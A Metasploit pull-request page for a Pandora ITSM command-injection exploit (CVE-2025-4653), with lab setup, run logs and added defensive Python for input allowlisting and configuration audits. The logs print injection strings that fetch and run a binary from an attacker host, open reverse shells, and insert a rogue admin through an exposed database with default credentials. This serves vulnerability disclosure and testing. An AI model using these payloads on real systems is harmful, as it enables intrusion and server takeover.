
Pandora ITSM auth RCE [CVE-2025-4653] #20399


Merged: 3 commits merged on Aug 7, 2025

Conversation

@h00die-gr3y (Contributor) commented Jul 20, 2025

Pandora ITSM is a platform for Service Management & Support including a Helpdesk for support and customer service teams, aligned with ITIL processes.
This module exploits a command injection vulnerability in the name backup setting at the application setup page of Pandora ITSM. This can be triggered by generating a backup with a malicious payload injected at the name parameter.
You need to have admin access at the Pandora ITSM Web application in order to execute this RCE.
This access can be achieved by knowing the admin credentials to access the web application or leveraging a default password vulnerability in Pandora ITSM that allows an attacker to access the Pandora FMS ITSM database, create a new admin user and gain administrative access to the Pandora ITSM Web application. This attack can be remotely executed over the WAN as long as the MySQL services are exposed to the outside world.
This issue affects all ITSM Enterprise editions up to 5.0.105 and is patched at 5.0.106.

The following releases were tested.

Pandora ITSM Releases:

  • Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97 on Ubuntu 22.04
  • Pandora ITSM Enterprise Edition 5.0.105 Build 250129 MR98 on Ubuntu 22.04

Installation steps to install Pandora ITSM Enterprise Edition on Ubuntu 22.04

  • Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
  • Here are the installation instructions for VirtualBox on MacOS.
  • Register for a free trial here.
  • Install a plain Ubuntu 22.04 VM image.
  • Log in at the Ubuntu VM with root.
  • Run apt update && apt upgrade to get the latest updates.
  • Run the following command:
        curl -SsL https://pfms.me/deploy-pandora-itsm > deploy-pandora-itsm
  • Check the file deploy-pandora-itsm and find the install_script variable that refers to itsm_deploy_enterprise_ubuntu_2204.sh:
        install_script='https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh'
  • Use the URL and download the file with curl, storing it locally in the file install.sh:
        curl -LSs https://packages.pandorafms.com/projects/deploy/itsm/iBxbqHhtHkOnzp1rINvG/itsm_deploy_enterprise_ubuntu_2204.sh > install.sh
  • Edit install.sh with your favorite editor and change the following line FROM:
        INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/latest/PandoraITSM_enterprise-latest.tar.gz"
    TO:
        INTEGRIA_PACKAGE_ENT="https://packages.pandorafms.com/c5553382c7268ea9d69dd2f889029162/LTS/PandoraITSM_enterprise-lts.tar.gz"
  • Run chmod +x install.sh and execute the script ./install.sh.
  • After successful installation of Pandora ITSM you can access the application using the webui via http://your_ip/pandoraitsm.

You are now ready to test the module.

Verification Steps

  • Start msfconsole
  • use exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653
  • set rhosts <ip-target>
  • set rport <port>
  • set lhost <attacker-ip>
  • set target <0=Unix/Linux Command>
  • exploit
    You should get a reverse shell or Meterpreter session depending on the payload and target settings.

Module in action

msf6 exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > options

Module options (exploit/linux/http/pandora_itsm_auth_rce_cve_2025_4653):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DB_NAME      pandoraitsm      yes       Pandora database
   DB_PASSWORD  P4ndor4.itsm     yes       Pandora database admin password
   DB_PORT      3306             yes       MySQL database port
   DB_USER      pandoraitsm      yes       Pandora database admin user
   PASSWORD     integria         no        Pandora web admin password
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
   RHOSTS       192.168.201.6    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /pandoraitsm     yes       Path to the Pandora ITSM application
   USERNAME     admin            no        Pandora web admin user
   VHOST                         no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.
                                              8 (Accepted: none, bash, python3.8+)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           192.168.201.10   yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      xHurjJzz         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Unix/Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > rexploit
[*] Reloading module...
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Succesfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending stage (3090404 bytes) to 192.168.201.6
[*] Meterpreter session 47 opened (192.168.201.10:4444 -> 192.168.201.6:33796) at 2025-07-20 19:15:29 +0000

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.201.6
OS           : Ubuntu 22.04 (Linux 5.15.0-144-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/var/www/html/pandoraitsm
meterpreter >
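The PR describes the root cause as a command injection through the backup name on the setup page, and the log above shows the shape of the injected name (`;echo${IFS}<base64>|(base64${IFS}--decode||base64${IFS}-d)|sh;#`). The Python below is an added example written for this page, not code from the Metasploit module or from Pandora ITSM: it shows the allowlist a hardened setup page would apply to a backup name before it is stored, and a scan over stored backup-list rows that flags names carrying the indicators seen in the log. The allowlist charset, the function names and the sample rows are assumptions; the base64 blob in the sample row is a placeholder.

```python
import re
from typing import Dict, List

# Assumption: a backup name only ever needs letters, digits, dot, dash and
# underscore, so anything else is rejected before it can reach a shell.
SAFE_BACKUP_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")

# Indicator patterns derived from the payload shape shown in the PR log:
#   ;echo${IFS}<base64>|(base64${IFS}--decode||base64${IFS}-d)|sh;#
INDICATORS = [
    (re.compile(r"[;&|`$]"), "shell metacharacter"),
    (re.compile(r"\$\{IFS\}"), "IFS whitespace substitution"),
    (re.compile(r"base64\S*\s*(--decode|-d)\b"), "base64 decode"),
    (re.compile(r"\|\s*(sh|bash|dash)\b"), "pipe into a shell"),
]


def is_safe_backup_name(name: str) -> bool:
    """Allowlist check a hardened setup page would apply before storing the name."""
    return SAFE_BACKUP_NAME.fullmatch(name) is not None


def injection_indicators(value: str) -> List[str]:
    """Return the label of every indicator pattern that matches `value`."""
    return [label for pattern, label in INDICATORS if pattern.search(value)]


def scan_backup_names(rows: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag backup-list rows whose name fails the allowlist.

    Each row is {"id_bk": ..., "name": ...}. In production the rows would be
    read from the ITSM backup list; here they are constructed samples.
    """
    findings = []
    for row in rows:
        if is_safe_backup_name(row["name"]):
            continue
        findings.append({
            "id_bk": row["id_bk"],
            "name": row["name"],
            "indicators": injection_indicators(row["name"]),
        })
    return findings


# Constructed sample rows: two legitimate names and one shaped like the
# injected name in the log (the base64 text is a placeholder, not a payload).
SAMPLE_ROWS = [
    {"id_bk": "15", "name": "nightly-2025-07-20"},
    {"id_bk": "16", "name": ";echo${IFS}UExBQ0VIT0xERVI=|(base64${IFS}--decode||base64${IFS}-d)|sh;#"},
    {"id_bk": "17", "name": "pre_upgrade.v5"},
]

if __name__ == "__main__":
    for finding in scan_backup_names(SAMPLE_ROWS):
        print(f"id_bk={finding['id_bk']} indicators={finding['indicators']}")
```

The allowlist is the actual fix: rejecting anything outside a small charset removes every metacharacter the indicator list looks for. The scan is useful after the fact, because the module deletes its backup entry on success (see the "Payload entries successfully removed" lines below), so a surviving entry in the list most likely means an attempt that did not complete.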

@msutovsky-r7 self-assigned this Jul 22, 2025

@msutovsky-r7 (Contributor) left a comment

msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true
[*] Command to run on remote host: curl -so ./qULHuihgMs http://192.168.168.128:8888/Q7JGOkCYlO14PhxIQeJRIQ;chmod +x ./qULHuihgMs;./qULHuihgMs&
[*] Fetch handler listening on 192.168.168.128:8888
[*] HTTP server started
[*] Adding resource /Q7JGOkCYlO14PhxIQeJRIQ
[*] Started reverse TCP handler on 192.168.168.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Succesfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials at the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9xVUxIdWloZ01zIGh0dHA6Ly8xOTIuMTY4LjE2OC4xMjg6ODg4OC9RN0pHT2tDWWxPMTRQaHhJUWVKUklRO2NobW9kICt4IC4vcVVMSHVpaGdNczsuL3FVTEh1aWhnTXMm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.195 requested /Q7JGOkCYlO14PhxIQeJRIQ
[*] Sending payload to 192.168.168.195 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.195
[*] Meterpreter session 5 opened (192.168.168.128:4444 -> 192.168.168.195:46798) at 2025-07-24 15:01:59 +0200
[*] No payload entries found at the backup list.

meterpreter > sysinfo 
Computer     : 192.168.168.195
OS           : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@msutovsky-r7 (Contributor)

msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true 
[*] Command to run on remote host: curl -so ./PttCMNWqGl http://192.168.168.196:8080/aLn4NjxVh0sVI6EJ21NX2g;chmod +x ./PttCMNWqGl;./PttCMNWqGl&
[*] Fetch handler listening on 192.168.168.196:8080
[*] HTTP server started
[*] Adding resource /aLn4NjxVh0sVI6EJ21NX2g
[*] Started reverse TCP handler on 192.168.168.196:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials admin:integria at the Pandora ITSM Web application.
[*] Successfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials to the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9QdHRDTU5XcUdsIGh0dHA6Ly8xOTIuMTY4LjE2OC4xOTY6ODA4MC9hTG40Tmp4Vmgwc1ZJNkVKMjFOWDJnO2NobW9kICt4IC4vUHR0Q01OV3FHbDsuL1B0dENNTldxR2wm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.197 requested /aLn4NjxVh0sVI6EJ21NX2g
[*] Sending payload to 192.168.168.197 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.197
[*] Meterpreter session 1 opened (192.168.168.196:4444 -> 192.168.168.197:52918) at 2025-08-07 08:31:58 +0200

[*] ["index.php?sec=godmode&sec2=enterprise/godmode/setup/integria_backup&offset=0&remove=1&id_bk=16"]
[+] Payload entries successfully removed from backup list.

meterpreter > 
meterpreter > sysinfo
Computer     : 192.168.168.197
OS           : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@msutovsky-r7 (Contributor)

msf exploit(linux/http/pandora_itsm_auth_rce_cve_2025_4653) > run verbose=true 
[*] Command to run on remote host: curl -so ./qfZvKulG http://192.168.168.196:8080/aLn4NjxVh0sVI6EJ21NX2g;chmod +x ./qfZvKulG;./qfZvKulG&
[*] Fetch handler listening on 192.168.168.196:8080
[*] HTTP server started
[*] Adding resource /aLn4NjxVh0sVI6EJ21NX2g
[*] Started reverse TCP handler on 192.168.168.196:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Pandora ITSM Enterprise Edition 5.0.104 Build 240802 MR97
[*] Trying to log in with admin credentials ffff:integria at the Pandora ITSM Web application.
[*] Logging in with admin credentials failed. Trying to connect to the Pandora MySQL server.
[*] Creating new admin user with credentials nsnik:9AHDHeD1D4 for access at the Pandora ITSM Web application.
[*] Trying to log in with new admin credentials nsnik:9AHDHeD1D4 at the Pandora ITSM Web application.
[*] Successfully authenticated at the Pandora ITSM Web application.
[*] Saving admin credentials to the msf database.
[*] Executing Unix/Linux Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] RCE payload: ;echo${IFS}Y3VybCAtc28gLi9xZlp2S3VsRyBodHRwOi8vMTkyLjE2OC4xNjguMTk2OjgwODAvYUxuNE5qeFZoMHNWSTZFSjIxTlgyZztjaG1vZCAreCAuL3FmWnZLdWxHOy4vcWZadkt1bEcm|(base64${IFS}--decode||base64${IFS}-d)|sh;#
[*] Client 192.168.168.197 requested /aLn4NjxVh0sVI6EJ21NX2g
[*] Sending payload to 192.168.168.197 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 192.168.168.197
[*] Meterpreter session 2 opened (192.168.168.196:4444 -> 192.168.168.197:51966) at 2025-08-07 08:34:28 +0200
[*] ["index.php?sec=godmode&sec2=enterprise/godmode/setup/integria_backup&offset=0&remove=1&id_bk=17"]
[+] Payload entries successfully removed from backup list.

meterpreter > sysinfo
Computer     : 192.168.168.197
OS           : Ubuntu 22.04 (Linux 6.8.0-64-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

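The run above exercises the module's fallback path from the PR description: when the web login fails, it connects to MySQL with the default database credentials and inserts a new admin user. The Python below is an added example for operators, not code from the module or from Pandora ITSM. It audits the three conditions that make that path work: a MySQL `bind-address` that exposes the server beyond localhost, credentials still equal to the defaults listed in the module's option table, and admin accounts that are not in an approved baseline. The config text, the baseline list and the function names are constructed assumptions.

```python
import re
from typing import Iterable, List, Set, Tuple

# Default pairs as shown in the module's option table (DB_USER/DB_PASSWORD and
# USERNAME/PASSWORD). Anything else in this file is a constructed sample.
KNOWN_DEFAULT_CREDENTIALS: Set[Tuple[str, str]] = {
    ("pandoraitsm", "P4ndor4.itsm"),  # MySQL user / password
    ("admin", "integria"),            # web admin user / password
}

# bind-address values that make MySQL reachable from other hosts.
WILDCARD_BIND = {"0.0.0.0", "::", "*"}


def audit_mysql_bind(my_cnf: str) -> List[str]:
    """Return findings about the bind-address in the [mysqld] section of a my.cnf text."""
    findings: List[str] = []
    section = None
    bind = None
    for raw in my_cnf.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:
            section = header.group(1).strip().lower()
            continue
        if section == "mysqld" and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if key.replace("_", "-") == "bind-address":
                bind = value
    if bind is None:
        findings.append("bind-address not set in [mysqld]: verify the server default is not all interfaces")
    elif bind in WILDCARD_BIND:
        findings.append(f"bind-address = {bind}: MySQL is reachable from other hosts")
    return findings


def default_credentials_in_use(pairs: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return the (user, password) pairs that still match a known default."""
    return sorted(pair for pair in pairs if pair in KNOWN_DEFAULT_CREDENTIALS)


def unexpected_admins(current: Iterable[str], baseline: Iterable[str]) -> List[str]:
    """Return admin accounts present now that are absent from the approved baseline."""
    return sorted(set(current) - set(baseline))


# Constructed sample config: exposed on all interfaces.
SAMPLE_MY_CNF = """
[client]
port = 3306

[mysqld]
port = 3306
bind-address = 0.0.0.0   # constructed: exposed
"""

# Constructed sample config: hardened to localhost only.
HARDENED_MY_CNF = """
[mysqld]
bind-address = 127.0.0.1
"""

if __name__ == "__main__":
    print(audit_mysql_bind(SAMPLE_MY_CNF))
    print(default_credentials_in_use([("pandoraitsm", "P4ndor4.itsm"), ("admin", "ChangedByOperator")]))
    # "nsnik" is the account name the module created in the run above.
    print(unexpected_admins(["admin", "nsnik"], ["admin"]))
```

Binding MySQL to localhost and rotating the default database password removes the fallback path entirely; the admin-baseline diff is the detection to keep running afterwards, since an account inserted directly into the database never passes through the web application's own audit trail.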
@msutovsky-r7 msutovsky-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 7, 2025
@msutovsky-r7 msutovsky-r7 merged commit 9caa2be into rapid7:master Aug 7, 2025
18 checks passed
@msutovsky-r7 (Contributor) commented Aug 7, 2025

Release Notes

This adds a new module for CVE-2025-4653 - authenticated remote code execution in Pandora ITSM. This module exploits a command injection vulnerability in the name backup setting on the application setup page of Pandora ITSM. This can be triggered by generating a backup with a malicious payload injected at the name parameter. The module requires valid application credentials. Alternatively, if a database is exposed, the module can create a new admin account by connecting to the database.

@h00die-gr3y h00die-gr3y deleted the pandora-itsm-auth-rce branch August 9, 2025 08:10
Labels
docs module rn-modules release notes for new or majorly enhanced modules
4 participants